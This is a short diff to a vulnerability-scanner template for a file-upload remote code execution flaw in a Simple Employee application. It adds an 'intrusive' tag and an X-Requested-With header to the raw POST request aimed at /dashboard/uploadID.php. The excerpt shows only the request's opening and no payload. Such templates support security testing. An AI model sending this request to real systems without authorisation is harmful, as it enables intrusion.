--- a/vulnerabilities/other/simple-employee-rce.yaml
+++ b/vulnerabilities/other/simple-employee-rce.yaml
@@ -5,7 +5,7 @@ info:
   author: pikpikcu
   severity: critical
   reference: https://www.exploit-db.com/exploits/49596
-  tags: rce
+  tags: rce,intrusive
 
 requests:
   - raw:
@@ -13,6 +13,7 @@ requests:
         POST /dashboard/uploadID.php HTTP/1.1
         Host: {{Hostname}}
         Accept: application/json, text/javascript, */*; q=0.01
+        X-Requested-With: XMLHttpRequest
         Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
 
         -----------------------------5825462663702204104870787337
